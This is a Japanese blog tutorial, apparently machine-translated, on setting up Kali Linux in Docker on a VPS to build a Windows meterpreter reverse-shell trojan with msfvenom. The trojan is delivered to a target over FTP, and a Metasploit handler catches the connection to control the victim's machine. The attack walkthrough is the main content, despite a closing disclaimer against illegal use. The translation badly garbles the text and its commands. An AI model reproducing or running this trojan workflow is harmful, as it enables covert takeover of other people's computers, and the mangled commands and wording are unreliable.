カーリートロイの木馬を利用するために、どのようにドッキングウィンドウについて話をするドッキングウィンドウのカーリーは、Linux上でミラーリングダウンロードしてインストールする方法についての記事、アップロード、今日では、その後にMSFリッスンします。スクリーンショットは、と絵と真実、ハハがあります!
まず、ポートマッピング
まず、ミラーがコンテナ内で実行されるため、VPS、カーリーの外側の容器と非接触と関連付けられていないので、外の世界と、このポートを介してそれを作るために、ポートマッピング、VPSのカーリーのコンテナ港のポートに接続されたポートを行います連絡先は、私の鏡を見てみましょう:ドッキングウィンドウの画像を
コンテナを作成し、カーリー容器に入力します。
4444 dennyah / PTE:時間/ binに/ bashのドッカーは4000 -p -itを実行します
説明:-itは、ユーザ端末のウィンドウの相互作用(/ binに/ bashの)が設けられています。
VPSのコンテナ港のポート4444にバインドされた4444 4000:4000 -p
私の背中がベースイメージです
第二に、生産、ここで使用lhostとlportはトロイの木馬があなたのVPSは、カリを結合させただけでIPアドレスとポートコンテナです
msfvenom -p窓/ meterpreter / reverse_tcp lhost = *。*。*。* lportは= 4000 -f exeファイル> /root/horse.exe
そして開くために、端末のうち、容器から生じたトロイの木馬のファイルコピー、コンテナ2025e69c1bf6:VPS /ルートにコピールート/ horse.exeファイルの下で
ドッキングウィンドウのCP 2025e69c1bf6:ルート/ horse.exe /ルート
そして、FTP経由でターゲットホストに送信され、ここで私は自分のローカルホストの実験で午前:
次のステップは、トロイの木馬のファイル上でクリックをフックするために、ユーザーを待っています。
三、MSFモニタの設定
MSFを頼って、使用することは、特に注意して、/マルチ/ハンドラモジュールちょうど窓/ meterpreter / reverse_tcpとペイロードを利用し、ここでlhost lportは書き込みIPとポートカーリー・コンテナ(4444):
第四に、攻撃し始めました
エクスプロイトの完了後に設定し、リスニング開始し、次いで得られたトロイの木馬ファイルを実行し、あなたは私の地元のドローンに以下の表示を見ることができます:
次に、あなたは、このようなマップの電流遮断ドローンなどのことを、やりたいことができます。
V.の概要
自分のアイデアを整理するために、ドッキングウィンドウを学習すると、知識ベースの多くは、最初に理解する必要があり、地球が震えていた、いわゆるベタ基礎の意味の理解を命令します。
私はこれだけノートと共有するための愛好家と交流の広大なネットワークを行います!その他の違法な目的のために使用しないでください!